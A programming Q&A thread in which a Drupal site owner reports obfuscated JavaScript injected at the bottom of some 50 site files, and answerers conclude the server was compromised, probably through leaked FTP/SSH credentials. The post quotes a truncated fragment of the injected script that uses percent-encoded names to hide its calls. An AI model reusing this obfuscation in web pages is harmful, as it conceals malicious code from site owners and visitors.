views:

46

answers:

2

I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code.

<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"

Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself?

I am using Drupal + Ubercart with quite minimal forms inputs.

A: 

What platform, browser?

Do you see it on all web pages or just those from a specific server?

Some "security firewalls" add Javascript to incoming pages.

Larry K
The js code physically there when I view the codes in my server which means my files have been compromised one way or another..
SteD
Your server has been hacked. The safest course is to rebuild the entire server. Remember that there could many other changes/additions to other files (including system files) on your system that you haven't found or noticed yet. Assume backdoors have been added, etc. Sorry to bring bad news. You're not alone in your situation.
Larry K
+1  A: 

Since the files have been modified, it is unlikely to be SQL injection. Either there is some other security flaw somewhere on the server or credentials for an ftp/ssh/etc account has leaked.

David Dorward